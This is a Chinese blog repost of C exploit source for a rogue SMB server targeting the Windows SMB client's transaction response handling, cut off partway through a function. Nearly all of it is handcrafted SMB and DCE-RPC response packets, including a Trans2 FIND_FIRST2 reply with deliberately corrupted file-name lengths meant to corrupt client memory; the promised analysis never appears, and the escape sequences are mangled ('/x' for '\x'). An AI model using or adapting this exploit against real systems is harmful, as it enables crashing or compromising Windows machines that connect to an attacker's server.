Windows SMB Client Transaction Response Handling exploit and analyzed

最新推荐文章于 2021-09-15 18:01:28 发布
最新推荐文章于 2021-09-15 18:01:28 发布
阅读量985 收藏
点赞数
文章标签: windows tree file attributes user allocation
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/funlove76/article/details/409680
版权

#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
#define PORT 445

char SmbNeg[] =
"/x00/x00/x00/x55"
"/xff/x53/x4d/x42" // SMB
"/x72" // SMB Command: Negotiate Protocol (0x72)
"/x00/x00/x00/x00" // NT Status: STATUS_SUCCESS (0x00000000)
"/x98" // Flags: 0x98
"/x53/xc8" // Flags2 : 0xc853
"/x00/x00" // Process ID High: 0
"/x00/x00/x00/x00/x00/x00/x00/x00" // Signature: 0000000000000000
"/x00/x00" // Reserved: 0000
"/x00/x00" // Tree ID: 0
"/xff/xfe" // Process ID: 65279
"/x00/x00" // User ID: 0
"/x00/x00" // Multiplex ID: 0
"/x11" // Word Count (WCT): 17
"/x05/x00" // Dialect Index: 5, greater than LANMAN2.1
"/x03" // Security Mode: 0x03
"/x0a/x00" // Max Mpx Count: 10
"/x01/x00" // Max VCs: 1
"/x04/x11/x00/x00" // Max Buffer Size: 4356
"/x00/x00/x01/x00" // Max Raw Buffer 65536
"/x00/x00/x00/x00" // Session Key: 0x00000000
"/xfd/xe3/x00/x80" // Capabilities: 0x8000e3fd
#define lpSYSTEMTIME 0x43
"/x52/xa2/x4e/x73/xcb/x75/xc5/x01"
// System Time: Jun 20, 2005 12:08:32.327125000
"/x88/xff" // Server Time Zone: /120 min from UTC
"/x00" // Key Length: 0
"/x10/x00" // Byte Count (BCC): 16
"/x9e/x12/xd7/x77/xd4/x59/x6c/x40" // Server GUID: 9E12D777D4596C40
"/xbc/xc0/xb4/x22/x40/x50/x01/xd4";// BCC0B422405001D4

char SessionSetupAndXNeg[] = // Negotiate ERROR Response
"/x00/x00/x01/x1b"
"/xff/x53/x4d/x42/x73/x16/x00/x00/xc0/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/xff/xfe" // Process ID: 0
"/x00/x08" // USER ID
"/x10/x00" // Multiplex ID: 0
"/x04/xff/x00/x1b/x01/x00/x00/xa6/x00/xf0/x00/x4e/x54/x4c/x4d/x53"
"/x53/x50/x00/x02/x00/x00/x00/x12/x00/x12/x00/x30/x00/x00/x00/x15"
"/x82/x8a/xe0"
"/x00/x00/x00/x00/x00/x00/x00/x00" // NTLM Challenge
"/x00/x00/x00/x00/x00/x00/x00/x00/x64/x00/x64/x00/x42/x00/x00/x00"
"/x53/x00/x45/x00/x52/x00/x56/x00/x49/x00/x43/x00/x45/x00/x50/x00"
"/x43/x00/x02/x00/x12/x00/x53/x00/x45/x00/x52/x00/x56/x00/x49/x00"
"/x43/x00/x45/x00/x50/x00/x43/x00/x01/x00/x12/x00/x53/x00/x45/x00"
"/x52/x00/x56/x00/x49/x00/x43/x00/x45/x00/x50/x00/x43/x00/x04/x00"
"/x12/x00/x73/x00/x65/x00/x72/x00/x76/x00/x69/x00/x63/x00/x65/x00"
"/x70/x00/x63/x00/x03/x00/x12/x00/x73/x00/x65/x00/x72/x00/x76/x00"
"/x69/x00/x63/x00/x65/x00/x70/x00/x63/x00/x06/x00/x04/x00/x01/x00"
"/x00/x00/x00/x00/x00/x00/x00/x57/x00/x69/x00/x6e/x00/x64/x00/x6f"
"/x00/x77/x00/x73/x00/x20/x00/x35/x00/x2e/x00/x31/x00/x00/x00/x57"
"/x00/x69/x00/x6e/x00/x64/x00/x6f/x00/x77/x00/x73/x00/x20/x00/x32"
"/x00/x30/x00/x30/x00/x30/x00/x20/x00/x4c/x00/x41/x00/x4e/x00/x20"
"/x00/x4d/x00/x61/x00/x6e/x00/x61/x00/x67/x00/x65/x00/x72/x00/x00";

char SessionSetupAndXAuth[] =
"/x00/x00/x00/x75"
"/xff/x53/x4d/x42/x73/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/xff/xfe" // Process ID: 0
"/x00/x00" // USER ID
"/x20/x00" // Multiplex ID: 0
"/x04/xff/x00/x75/x00/x01/x00/x00/x00/x4a/x00/x4e/x57/x00/x69/x00"
"/x6e/x00/x64/x00/x6f/x00/x77/x00/x73/x00/x20/x00/x35/x00/x2e/x00"
"/x31/x00/x00/x00/x57/x00/x69/x00/x6e/x00/x64/x00/x6f/x00/x77/x00"
"/x73/x00/x20/x00/x32/x00/x30/x00/x30/x00/x30/x00/x20/x00/x4c/x00"
"/x41/x00/x4e/x00/x20/x00/x4d/x00/x61/x00/x6e/x00/x61/x00/x67/x00"
"/x65/x00/x72/x00/x00";

char TreeConnectAndX[] =
"/x00/x00/x00/x38"
"/xff/x53/x4d/x42/x75/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/xff/xfe" // Process ID: 0
"/x00/x00" // USER ID
"/x30/x00" // Multiplex ID: 0
"/x07/xff/x00/x38/x00/x01/x00/xff/x01/x00/x00/xff/x01/x00/x00/x07"
"/x00/x49/x50/x43/x00/x00/x00/x00";

char SmbNtCreate [] =
"/x00/x00/x00/x87"
"/xff/x53/x4d/x42" // SMB
"/xa2" // SMB Command: NT Create AndX (0xa2)
"/x00/x00/x00/x00" // NT Status: STATUS_SUCCESS (0x00000000)
"/x98" // Flags: 0x98
"/x07/xc8" // Flags2 : 0xc807
"/x00/x00" // Process ID High: 0
"/x00/x00/x00/x00/x00/x00/x00/x00" // Signature: 0000000000000000
"/x00/x00" // Reserved: 0000
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // User ID: 0
"/x40/x00" // Multiplex ID: 0
"/x2a" // Word Count (WCT): 42
"/xff" // AndXCommand: No further commands (0xff)
"/x00" // Reserved: 00
"/x87/x00" // AndXOffset: 135
"/x00" // Oplock level: No oplock granted (0)
"/x00/x00" // FID: 0
"/x01/x00/x00/x00" // Create action: The file existed and was opened (1)
"/x00/x00/x00/x00/x00/x00/x00/x00" // Created: No time specified (0)
"/x00/x00/x00/x00/x00/x00/x00/x00" // Last Access: No time specified (0)
"/x00/x00/x00/x00/x00/x00/x00/x00" // Last Write: No time specified (0)
"/x00/x00/x00/x00/x00/x00/x00/x00" // Change: No time specified (0)
"/x80/x00/x00/x00" // File Attributes: 0x00000080
"/x00/x10/x00/x00/x00/x00/x00/x00" // Allocation Size: 4096
"/x00/x00/x00/x00/x00/x00/x00/x00" // End Of File: 0
"/x02/x00" // File Type: Named pipe in message mode (2)
"/xff/x05" // IPC State: 0x05ff
"/x00" // Is Directory: This is NOT a directory (0)
"/x00/x00" // Byte Count (BCC): 0

// crap
"/x00/x00/x00/x0f/x00/x00/x00/x00"
"/x00/x74/x7a/x4f/xac/x2d/xdf/xd9"
"/x11/xb9/x20/x00/x10/xdc/x9b/x01"
"/x12/x00/x9b/x01/x12/x00/x1b/xc2";

char DceRpc[] =
"/x00/x00/x00/x7c"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x44/x00/x00/x00/x00/x00/x38/x00/x00/x00/x44/x00/x38"
"/x00/x00/x00/x00/x00/x45/x00/x00/x05/x00/x0c/x03/x10/x00/x00/x00"
"/x44/x00/x00/x00/x01/x00/x00/x00/xb8/x10/xb8/x10"
"/x00/x00/x00/x00" // Assoc Group
"/x0d/x00/x5c/x50/x49/x50/x45/x5c"
"/x00/x00/x00" // srv or wks
"/x73/x76/x63/x00/xff/x01/x00/x00/x00/x00/x00/x00/x00/x04/x5d/x88"
"/x8a/xeb/x1c/xc9/x11/x9f/xe8/x08/x00/x2b/x10/x48/x60/x02/x00/x00"
"/x00";

char WksSvc[] =
"/x00/x00/x00/xb0"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x78/x00/x00/x00/x00/x00/x38/x00/x00/x00/x78/x00/x38"
"/x00/x00/x00/x00/x00/x79/x00/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x78/x00/x00/x00/x01/x00/x00/x00/x60/x00/x00/x00/x00/x00/x00/x00"
"/x64/x00/x00/x00/xb8/x0f/x16/x00/xf4/x01/x00/x00/xe6/x0f/x16/x00"
"/xd2/x0f/x16/x00/x05/x00/x00/x00/x01/x00/x00/x00/x0a/x00/x00/x00"
"/x00/x00/x00/x00/x0a/x00/x00/x00/x53/x00/x45/x00/x52/x00/x56/x00"
"/x49/x00/x43/x00/x45/x00/x50/x00/x43/x00/x00/x00/x0a/x00/x00/x00"
"/x00/x00/x00/x00/x0a/x00/x00/x00/x57/x00/x4f/x00/x52/x00/x4b/x00"
"/x47/x00/x52/x00/x4f/x00/x55/x00/x50/x00/x00/x00/x00/x00/x00/x00";

char SrvSvc[] =
"/x00/x00/x00/xac"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x74/x00/x00/x00/x00/x00/x38/x00/x00/x00/x74/x00/x38"
"/x00/x00/x00/x00/x00/x75/x00/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x74/x00/x00/x00/x01/x00/x00/x00/x5c/x00/x00/x00/x00/x00/x00/x00"
"/x65/x00/x00/x00/x68/x3d/x14/x00/xf4/x01/x00/x00"
"/x80/x3d/x14/x00" // Server IP
"/x05/x00/x00/x00/x01/x00/x00/x00/x03/x10/x05/x00/x9c/x3d/x14/x00"
"/x0e/x00/x00/x00/x00/x00/x00/x00/x0e/x00/x00/x00"
"/x31/x00/x39/x00/x32/x00/x2e/x00/x31/x00/x36/x00/x38/x00/x2e/x00"
// Server IP ( UNICODE )
"/x31/x00/x2e/x00/x36/x00/x31/x00/x00/x00/x00/x00"
"/x01/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x55/x00"
"/x00/x00/x00/x00";

char SmbClose[] =
"/x00/x00/x00/x23"
"/xff/x53/x4d/x42" // SMB
"/x04" // SMB Command: Close (0x04)
"/x00/x00/x00/x00" // NT Status: STATUS_SUCCESS (0x00000000)
"/x98" // Flags: 0x98
"/x07/xc8" // Flags2 : 0xc807
"/x00/x00" // Process ID High: 0
"/x00/x00/x00/x00/x00/x00/x00/x00" // Signature: 0000000000000000
"/x00/x00" // Reserved: 0000
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x00" // Word Count (WCT): 0
"/x00/x00"; // Byte Count (BCC): 0

char NetrShareEnum[] =
"/x00/x00/x01/x90"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x58/x01/x00/x00/x00/x00/x38/x00/x00/x00/x58/x01/x38"
"/x00/x00/x00/x00/x00/x59/x01/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x58/x01/x00/x00/x01/x00/x00/x00/x40/x01/x00/x00/x00/x00/x00/x00"
"/x01/x00/x00/x00/x01/x00/x00/x00/x54/x0a/x17/x00/x04/x00/x00/x00"
"/xa0/x28/x16/x00/x04/x00/x00/x00/x80/x48/x16/x00/x03/x00/x00/x80"
"/x8a/x48/x16/x00/x6e/x48/x16/x00/x00/x00/x00/x00/x7e/x48/x16/x00"
"/x48/x48/x16/x00/x00/x00/x00/x80/x56/x48/x16/x00/x20/x48/x16/x00"
"/x00/x00/x00/x80/x26/x48/x16/x00/x05/x00/x00/x00/x00/x00/x00/x00"
"/x05/x00/x00/x00/x49/x00/x50/x00/x43/x00/x24/x00/x00/x00/x36/x00"
"/x0b/x00/x00/x00/x00/x00/x00/x00/x0b/x00/x00/x00/x52/x00/x65/x00"
"/x6d/x00/x6f/x00/x74/x00/x65/x00/x2d/x00/x49/x00/x50/x00/x43/x00"
"/x00/x00/x37/x00/x08/x00/x00/x00/x00/x00/x00/x00/x08/x00/x00/x00"
"/x6e/x00/x65/x00/x74/x00/x62/x00/x69/x00/x6f/x00/x73/x00/x00/x00"
"/x01/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00"
"/x07/x00/x00/x00/x00/x00/x00/x00/x07/x00/x00/x00/x41/x00/x44/x00"
"/x4d/x00/x49/x00/x4e/x00/x24/x00/x00/x00/x00/x00/x0c/x00/x00/x00"
"/x00/x00/x00/x00/x0c/x00/x00/x00/x52/x00/x65/x00/x6d/x00/x6f/x00"
"/x74/x00/x65/x00/x61/x00/x64/x00/x6d/x00/x69/x00/x6e/x00/x00/x00"
"/x03/x00/x00/x00/x00/x00/x00/x00/x03/x00/x00/x00/x43/x00/x24/x00"
"/x00/x00/x39/x00/x11/x00/x00/x00/x00/x00/x00/x00/x11/x00/x00/x00"
"/x53/x00/x74/x00/x61/x00/x6e/x00/x64/x00/x61/x00/x72/x00/x64/x00"
"/x66/x00/x72/x00/x65/x00/x69/x00/x67/x00/x61/x00/x62/x00/x65/x00"
"/x00/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";

char OpenPrinterEx[] =
"/x00/x00/x00/x68"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x30/x00/x00/x00/x00/x00/x38/x00/x00/x00/x30/x00/x38"
"/x00/x00/x00/x00/x00/x31/x00/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x30/x00/x00/x00/x01/x00/x00/x00/x18/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x24/xd7/x9c/xf8/xbb/xe1/xd9/x11/xb9/x29/x00/x10"
"/xdc/x4a/x6b/xbb/x00/x00/x00/x00";

char m_ClosePrinter[] =
"/x00/x00/x00/x68"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x30/x00/x00/x00/x00/x00/x38/x00/x00/x00/x30/x00/x38"
"/x00/x00/x00/x00/x00/x31/x00/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x30/x00/x00/x00/x02/x00/x00/x00/x18/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00";

char OpenHklm[] =
"/x00/x00/x00/x68"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x30/x00/x00/x00/x00/x00/x38/x00/x00/x00/x30/x00/x38"
"/x00/x00/x00/x00/x00/x31/x00/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x30/x00/x00/x00/x01/x00/x00/x00/x18/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x4e/x4c/xb2/xf8/xbb/xe1/xd9/x11/xb9/x29/x00/x10"
"/xdc/x4a/x6b/xbb/x00/x00/x00/x00";

char OpenKey[] =
"/x00/x00/x00/x68"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x30/x00/x00/x00/x00/x00/x38/x00/x00/x00/x30/x00/x38"
"/x00/x00/x00/x00/x00/x31/x00/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x30/x00/x00/x00/x02/x00/x00/x00/x18/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x05/x00/x00/x00";

char CloseKey[] =
"/x00/x00/x00/x68"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x30/x00/x00/x00/x00/x00/x38/x00/x00/x00/x30/x00/x38"
"/x00/x00/x00/x00/x00/x31/x00/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x30/x00/x00/x00/x03/x00/x00/x00/x18/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00";

char NetBios1[] =
"/x00/x00/x00/x94"
"/xff/x53/x4d/x42/x25/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a/x00/x00/x5c/x00/x00/x00/x00/x00/x38/x00/x00/x00/x5c/x00/x38"
"/x00/x00/x00/x00/x00/x5d/x00/x00/x05/x00/x02/x03/x10/x00/x00/x00"
"/x5c/x00/x00/x00/x01/x00/x00/x00/x44/x00/x00/x00/x00/x00/x00/x00"
"/x01/x00/x00/x00/xc0/xa2/x16/x00/xae/xc2/x16/x00/x00/x00/x00/x00"
"/xbe/xc2/x16/x00/x08/x00/x00/x00/x00/x00/x00/x00/x08/x00/x00/x00"
"/x6e/x00/x65/x00/x74/x00/x62/x00/x69/x00/x6f/x00/x73/x00/x00/x00"
"/x01/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x2e/x00"
"/x00/x00/x00/x00";

char NetBios2[] =
"/x00/x00/x00/x3e"
"/xff/x53/x4d/x42/x75/x00/x00/x00/x00/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x07/xff/x00/x3e/x00/x01/x00/xff/x01/x00/x00/xff/x01/x00/x00/x0d"
"/x00/x41/x3a/x00/x4e/x00/x54/x00/x46/x00/x53/x00/x00/x00";

// Trans2 Response, QUERY_PATH_INFO
char Trans2Response1[] =
"/x00/x00/x00/x64"
"/xff/x53/x4d/x42" // SMB
"/x32" // SMB Command: Trans2 (0x32)
"/x00/x00/x00/x00" // NT Status: STATUS_SUCCESS (0x00000000)
"/x98" // Flags: 0x98
"/x07/xc8" // Flags2 : 0xc807
"/x00/x00" // Process ID High: 0
"/x00/x00/x00/x00/x00/x00/x00/x00" // Signature: 0000000000000000
"/x00/x00" // Reserved: 0000
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a" // Word Count (WCT): 10
"/x02/x00" // Total Parameter Count: 2
"/x28/x00" // Total Data Count: 40
"/x00/x00" // Reserved: 0000
"/x02/x00" // Parameter Count: 2
"/x38/x00" // Parameter Offset: 56
"/x00/x00" // Parameter Displacement: 0
"/x28/x00" // Data Count: 40
"/x3c/x00" // Data Offset: 60
"/x00/x00" // Data Displacement: 0
"/x00" // Setup Count: 0
"/x00" // Reserved: 00
"/x2d/x00" // Byte Count (BCC): 45
"/x00" // Padding: 00
"/x00/x00" // EA Error offset: 0
"/x00/x01" // Padding: 0001
"/xe8/x35/xcf/x94/x39/x73/xc5/x01" // Created: Jun 17, 2005 05:39:19.686500000
"/x8c/x24/xba/x5c/x3a/x73/xc5/x01" // Last Access: Jun 17, 2005 05:44:55.092750000
"/xe8/x35/xcf/x94/x39/x73/xc5/x01" // Last Write: Jun 17, 2005 05:39:19.686500000
"/x9c/x81/x67/x98/x39/x73/xc5/x01" // Change: Jun 17, 2005 05:39:25.717750000
"/x10/x00/x00/x00" // File Attributes: 0x00000010
"/x00/x00/x00/x00"; // Unknown Data: 00000000

// Trans2 Response, QUERY_PATH_INFO
unsigned char Trans2Response2[] = // ERROR Response
"/x00/x00/x00/x23"
"/xff/x53/x4d/x42/x32/x34/x00/x00/xc0/x98/x07/xc8/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x00/x00/x00";

// Trans2 Response, FIND_FIRST2, Files: . ..
char Trans2Response3[] =
"/x00/x00/x01/x0c"
"/xff/x53/x4d/x42" // SMB
"/x32" // SMB Command: Trans2 (0x32)
"/x00/x00/x00/x00" // NT Status: STATUS_SUCCESS (0x00000000)
"/x98" // Flags: 0x98
"/x07/xc8" // Flags2 : 0xc807
"/x00/x00" // Process ID High: 0
"/x00/x00/x00/x00/x00/x00/x00/x00" // Signature: 0000000000000000
"/x00/x00" // Reserved: 0000
"/x00/x00" // Tree ID: 0
"/x00/x00" // Process ID: 0
"/x00/x00" // USER ID
"/x00/x00" // Multiplex ID: 0
"/x0a" // Word Count (WCT): 10
"/x0a/x00" // Total Parameter Count: 10
"/xc8/x00" // Total Data Count: 200
"/x00/x00" // Reserved: 0000
"/x0a/x00" // Parameter Count: 10
"/x38/x00" // Parameter Offset: 56
"/x00/x00" // Parameter Displacement: 0
"/xc8/x00" // Data Count: 200
"/x44/x00" // Data Offset: 68
"/x00/x00" // Data Displacement: 0
"/x00" // Setup Count: 0
"/x00" // Reserved: 00
"/xd5/x00" // Byte Count (BCC): 213
"/x00" // Padding: 00
"/x01/x08" // Search ID: 0x0801
"/x02/x00" // Seatch Count: 2
"/x01/x00" // End of Search: 1
"/x00/x00" // EA Error offset: 0
"/x60/x00" // Last Name offset: 96
"/x38/x00" // Padding: 3800
"/x60/x00/x00/x00" // Next Entry offset: 96
"/x00/x00/x00/x00" // File Index: 0
"/xe8/x35/xcf/x94/x39/x73/xc5/x01" // Created: Jun 17, 2005 05:39:19.686500000
"/xac/x09/x3c/xae/x39/x73/xc5/x01" // Last Access: Jun 17, 2005 05:40:02.342750000
"/xe8/x35/xcf/x94/x39/x73/xc5/x01" // Last Write: Jun 17, 2005 05:39:19.686500000
"/x9c/x81/x67/x98/x39/x73/xc5/x01" // Change: Jun 17, 2005 05:39:25.717750000
"/x00/x00/x00/x00/x00/x00/x00/x00" // End of File: 0
"/x00/x00/x00/x00/x00/x00/x00/x00" // Allocation Size: 0
"/x10/x00/x00/x00" // File Attributes: 0x00000010
//"/x02/x00/x00/x00" // File Name Len: 2
"/xff/xff/xff/xff" // Bad File Name Len
"/x00/x00/x00/x00" // EA List Length: 0
//"/x00" // Short File Name Len: 0
"/xff" // Bad Short File Name Len
"/x00" // Reserved: 00
"/x00/x00/x00/x00/x00/x00/x00/x00" // Short File Name:
"/x00/x00/x00/x00/x00/x00/x00/x00" // Short File Name:
"/x00/x00/x00/x00/x00/x00/x00/x00" // Short File Name:
"/x2e/x00" // File Name: .
"/x00/x00/x00/x00" // Next Entry Offset: 0
"/x00/x00/x00/x00" // File Index: 0
"/xe8/x35/xcf/x94/x39/x73/xc5/x01" // Created: Jun 17, 2005 05:39:19.686500000
"/xac/x09/x3c/xae/x39/x73/xc5/x01" // Last Access: Jun 17, 2005 05:40:02.342750000
"/xe8/x35/xcf/x94/x39/x73/xc5/x01" // Last Write: Jun 17, 2005 05:39:19.686500000
"/x9c/x81/x67/x98/x39/x73/xc5/x01" // Change: Jun 17, 2005 05:39:25.717750000
"/x00/x00/x00/x00/x00/x00/x00/x00" // End Of File: 0
"/x00/x00/x00/x00/x00/x00/x00/x00" // Allocation Size: 0
"/x10/x00/x00/x00" // File Attributes: 0x00000010
"/x04/x00/x00/x00" // File Name Len: 4
"/x00/x00/x00/x00" // EA List Length: 0
"/x00" // Short File Name Len: 0
"/x00" // Reserved: 00
"/x00/x00/x00/x00/x00/x00/x00/x00" // Short File Name:
"/x00/x00/x00/x00/x00/x00/x00/x00" // Short File Name:
"/x00/x00/x00/x00/x00/x00/x00/x00" // Short File Name:
"/x2e/x00/x2e/x00" // File Name: ..
"/x00/x00/x00/x00/x00/x00"; // Unknown Data: 000000000000

int
check_interface ( unsigned char* str )
{
 int i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;
 
 //Interface UUID
 unsigned char wks_uuid[] = "/x98/xd0/xff/x6b/x12/xa1/x10/x36/x98/x33/x46/xc3/xf8/x7e/x34/x5a";
 unsigned char srv_uuid[] = "/xc8/x4f/x32/x4b/x70/x16/xd3/x01/x12/x78/x5a/x47/xbf/x6e/xe1/x88";
 unsigned char spl_uuid[] = "/x78/x56/x34/x12/x34/x12/xcd/xab/xef/x00/x01/x23/x45/x67/x89/xab";
 unsigned char wrg_uuid[] = "/x01/xd0/x8c/x33/x44/x22/xf1/x31/xaa/xaa/x90/x00/x38/x00/x10/x03";
 
 for ( i = 0; i < 16; i++ )
 {
  j = 0;
  if ( str[120 + i] < 0 )
  {
   if ( ( str[120 + i] + 0x100 ) == wks_uuid[i] )
   { wks++; j = 1; }
   if ( ( str[120 + i] + 0x100 ) == srv_uuid[i] )
   { srv++; j = 1; }
   if ( ( str[120 + i] + 0x100 ) == spl_uuid[i] )
   { spl++; j = 1; }
   if ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] )
   { wrg++; j = 1; }
   if ( j == 0 )
    foo++;
  }
  else
  {
   if ( str[120 + i] == wks_uuid[i] )
   { wks++; j = 1; }
   if ( str[120 + i] == srv_uuid[i] )
   { srv++; j = 1; }
   if ( str[120 + i] == spl_uuid[i] )
   { spl++; j = 1; }
   if ( str[120 + i] == wrg_uuid[i] )
   { wrg++; j = 1; }
   if ( j == 0 )
    foo++;
  }
 }
 if ( wks == 16 )
  return ( 0 );
 else if ( srv == 16 )
  return ( 1 );
 else if ( spl == 16 )
  return ( 2 );
 else if ( wrg == 16 )
  return ( 3 );
 else
 {
  printf ( "there is/are %d invalid byte(s) in the interface UUID!/n", foo );
  for(i=120;i<120+16;i++)
  {
   printf("%02x ",str[120+i]);
  }
  printf("/n");
  return ( -1 );
 }
}

void neg ( int s )
{
 FILETIME ft;
 SYSTEMTIME st;
 char response[1024];
 
 GetSystemTime(&st);
 SystemTimeToFileTime(&st,&ft);
 memset ( &response,0, sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 send ( s, (char *)SmbNeg, sizeof ( SmbNeg ) -1, 0 );
}

void
sessionsetup ( int s, unsigned long userid, unsigned long treeid, int option )
{
 char response[1024];
 unsigned char ntlm_challenge1[] = "/x4a/xa8/x3a/x7e/xa8/x10/xa1/x52";//"/xa2/x75/x1b/x10/xe7/x62/xb0/xc3";
 unsigned char ntlm_challenge2[] = "/xe1/xed/x43/x66/xc7/xa7/x36/xbd";
 
 memset ( &response,0, sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "SessionSetupAndXNeg/n" );
 SessionSetupAndXNeg[30] = response[30];
 SessionSetupAndXNeg[31] = response[31];
 SessionSetupAndXNeg[34] = response[34];
 SessionSetupAndXNeg[35] = response[35];
 
 strncpy ( (char *)SessionSetupAndXNeg + 32, ( char* ) &userid, 2 );
 if ( option == 0 )
  memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );
 else
  memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );
 
 send ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );
 
 memset ( &response, 0,sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "SessionSetupAndXAuth/n" );
 SessionSetupAndXAuth[30] = response[30];
 SessionSetupAndXAuth[31] = response[31];
 SessionSetupAndXAuth[34] = response[34];
 SessionSetupAndXAuth[35] = response[35];
 
 strncpy ( SessionSetupAndXAuth + 32, ( char* ) &userid, 2 );
 
 send ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );
 
 memset ( &response, 0,sizeof ( response ) );
